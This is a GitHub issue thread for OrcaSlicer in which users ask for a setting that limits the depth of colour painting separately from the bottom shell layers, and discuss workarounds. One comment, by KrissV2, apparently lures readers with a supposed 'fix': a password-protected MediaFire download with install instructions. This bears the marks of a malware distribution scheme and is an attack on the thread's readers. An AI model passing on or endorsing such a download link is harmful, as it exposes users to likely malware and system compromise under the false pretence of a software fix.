OrcaSlicer/OrcaSlicer #6617: Control depth of painting, separate from bottom shell layer number

Biglogh, 2024-08-31:
### Is there an existing issue for this feature request?

- [X] I have searched the existing issues

### Is your feature request related to a problem?

I sell products that need to be strong and waterproof, therefore I use a large number of bottom shell layers. The products also frequently have logos that I use the paint tool for different colors. If I paint a logo, I can't control the depth of the painting. I only want to print the logo a few layers deep for two reasons. 1...I need the logo to be covered by single color layers to cover all gaps that may be exposed in the logo, this is for waterproofing (i.e. if i select 7 bottom layers, I only want the painting portion to be 4 layers, and then covered up by 3 more layers non painted). 2...being able to control the number of painted layers can help me improve print time due to less material swaps.

### Which printers will be beneficial to this feature?

All

### Describe the solution you'd like

If I paint a flower on the bottom of the part, I want to be able to select the number of layers the painted flower will be in. 
Ex. I have a white part with a pink painted flower on the bottom. I select 7 total bottom shell layers, but I also want to select only 4 layers for the pink flower, and the other 3 of 7 layers will be white covering the pink flower.

https://github.com/user-attachments/assets/35c6f7bc-7890-4d36-9819-f08687b579f9

### Describe alternatives you've considered

In a previous version I was able to get around this by defining the painted layers within the bottom shell layers first, then when I changed the bottom shell layers afterwards, it wouldn't change the initial bottom layer selection for the painted portion. (select 4 layers first, slice, select 7 layers, slice. This would yield 4 layers of painting, 3 layers overtop without painting.) The newest version behaves differently now.

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

Biglogh, 2024-08-31:
figured out bottom shell layers will control painted portions, but if you want anything further you can use bottom shell thickness to get around it.

closed 2024-08-31 by Biglogh

rbuckton, 2024-09-27:
Color-depth would still be useful when painting surfaces that are not parallel to the bottom shell. I've had a few cases where painting results in color applied a few cm away near another feature of the model that results in discoloration in the final print when the top surface is a light color, like white.

corndog2000, 2025-03-14:
Has there been any work on this issue? I want to be able to paint one layer with different colors and still have the rest of the top/bottom shell layers be solid infill to keep the infill structure from showing through.